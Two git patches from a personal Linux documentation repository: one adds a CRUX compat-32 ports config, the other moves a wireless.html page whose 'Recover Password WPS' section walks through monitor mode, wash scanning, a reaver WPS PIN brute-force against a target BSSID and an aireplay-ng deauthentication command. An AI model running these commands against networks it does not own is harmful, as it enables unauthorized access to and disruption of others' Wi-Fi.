From 0d1b620e0d3d4dfb1a8f1bd903d52b50af61275d Mon Sep 17 00:00:00 2001 From: Silvino Date: Sun, 28 Feb 2021 19:43:36 +0000 Subject: added compat-32 ports collection --- linux/conf/ports/compat-32.git | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 linux/conf/ports/compat-32.git diff --git a/linux/conf/ports/compat-32.git b/linux/conf/ports/compat-32.git new file mode 100644 index 0000000..9f89a92 --- /dev/null +++ b/linux/conf/ports/compat-32.git @@ -0,0 +1,7 @@ +# Collection compat-32 +# +NAME=compat-32 +URL=git://crux.nu/ports/compat-32.git +BRANCH=3.6 +destination=/usr/ports/compat-32 +PORTS_DIR="/usr/ports" -- cgit 1.4.1-2-gfad0 From 4b2865afee1915f229c8c0162ac0d3447237a000 Mon Sep 17 00:00:00 2001 From: Silvino Date: Mon, 1 Mar 2021 13:50:26 +0000 Subject: fix wireless.html location --- linux/wireless.html | 133 ++++++++++++++++++++++++++++++++++++++++++++++++++++ tools/wireless.html | 133 ---------------------------------------------------- 2 files changed, 133 insertions(+), 133 deletions(-) create mode 100644 linux/wireless.html delete mode 100644 tools/wireless.html diff --git a/linux/wireless.html b/linux/wireless.html new file mode 100644 index 0000000..e15b112 --- /dev/null +++ b/linux/wireless.html @@ -0,0 +1,133 @@ + + + + Wireless + + + Tools Index + +

Wireless

+ +

Manual configuration

+ +
+        # iwlist wlp2s0 scan
+        # iwconfig wlp2s0 essid name_of_network
+        
+ +

To get mac address of the target cell;

+ +
+        # iwlist wlp2s0 scan
+        
+ +

Example output that matter;

+ +
+        Cell 03 - Address: A8:A6:68:98:0C:C5
+        
+ + +

Recover Password WPS

+ +

First check processes that interfere with state of the interface and kill them;

+ +
+        # airmon-ng check
+
+
+        Found 5 processes that could cause trouble.
+        If airodump-ng, aireplay-ng or airtun-ng stops working after
+        a short period of time, you may want to kill (some of) them!
+
+        PID     Name
+        1271    wpa_supplicant
+        1576    wpa_supplicant
+        1633    dhclient
+        Process with PID 1576 (wpa_supplicant) is running on interface wlan0
+        Process with PID 1633 (dhclient) is running on interface wlan0
+        
+ +

Pkill or kill all of them, ex 1271;

+ +
+        # kill -15 1271
+        
+ +

If that fails;

+ +
+        # kill -9 1271
+        
+ +

If wireless card is intel;

+ +
+        # rmmod iwlmvm
+        # rmmod iwlwifi
+        # modprob iwlwifi
+        
+ +

Put interface in monitor mode;

+ +
+        # iwconfig wlp2s0 mode monitor
+        # ifconfig wlp2s0 up
+        
+ +
+        # airmon-ng start wlp2s0
+
+
+        Interface       Chipset         Driver
+
+        wlp2s0           Intel AC        iwlwifi - [phy1]
+                                        (monitor mode enabled on mon0)
+        
+ +

Airdump-ng don't report if a router have WPS or not, for that is used wash;

+ +
+        # wash -i wlp2s0
+        
+ +

If the program report "Found packet with bad FCS", run with -C;

+ +
+        # wash -C -i wlp2s0
+        
+ +

Put mon0 on same channel of target cell;

+ +
+        # iwconfig mon0 channel 6
+        
+ +

Start the magic;

+ +
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
+        
+ +

If BSSID is cloaked, not being broadcasted, provide it to reaver;

+ +
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
+        
+ +

-a address of access point, -c client to deauthenticate

+ +
+        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
+        
+ + + Tools Index + +

This is part of the LeetIO System Documentation. + Copyright (C) 2021 + LeetIO Team. + See the file Gnu Free Documentation License + for copying conditions.

+ + diff --git a/tools/wireless.html b/tools/wireless.html deleted file mode 100644 index e15b112..0000000 --- a/tools/wireless.html +++ /dev/null @@ -1,133 +0,0 @@ - - - - Wireless - - - Tools Index - -

Wireless

- -

Manual configuration

- -
-        # iwlist wlp2s0 scan
-        # iwconfig wlp2s0 essid name_of_network
-        
- -

To get mac address of the target cell;

- -
-        # iwlist wlp2s0 scan
-        
- -

Example output that matter;

- -
-        Cell 03 - Address: A8:A6:68:98:0C:C5
-        
- - -

Recover Password WPS

- -

First check processes that interfere with state of the interface and kill them;

- -
-        # airmon-ng check
-
-
-        Found 5 processes that could cause trouble.
-        If airodump-ng, aireplay-ng or airtun-ng stops working after
-        a short period of time, you may want to kill (some of) them!
-
-        PID     Name
-        1271    wpa_supplicant
-        1576    wpa_supplicant
-        1633    dhclient
-        Process with PID 1576 (wpa_supplicant) is running on interface wlan0
-        Process with PID 1633 (dhclient) is running on interface wlan0
-        
- -

Pkill or kill all of them, ex 1271;

- -
-        # kill -15 1271
-        
- -

If that fails;

- -
-        # kill -9 1271
-        
- -

If wireless card is intel;

- -
-        # rmmod iwlmvm
-        # rmmod iwlwifi
-        # modprob iwlwifi
-        
- -

Put interface in monitor mode;

- -
-        # iwconfig wlp2s0 mode monitor
-        # ifconfig wlp2s0 up
-        
- -
-        # airmon-ng start wlp2s0
-
-
-        Interface       Chipset         Driver
-
-        wlp2s0           Intel AC        iwlwifi - [phy1]
-                                        (monitor mode enabled on mon0)
-        
- -

Airdump-ng don't report if a router have WPS or not, for that is used wash;

- -
-        # wash -i wlp2s0
-        
- -

If the program report "Found packet with bad FCS", run with -C;

- -
-        # wash -C -i wlp2s0
-        
- -

Put mon0 on same channel of target cell;

- -
-        # iwconfig mon0 channel 6
-        
- -

Start the magic;

- -
-        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
-        
- -

If BSSID is cloaked, not being broadcasted, provide it to reaver;

- -
-        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
-        
- -

-a address of access point, -c client to deauthenticate

- -
-        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
-        
- - - Tools Index - -

This is part of the LeetIO System Documentation. - Copyright (C) 2021 - LeetIO Team. - See the file Gnu Free Documentation License - for copying conditions.

- - -- cgit 1.4.1-2-gfad0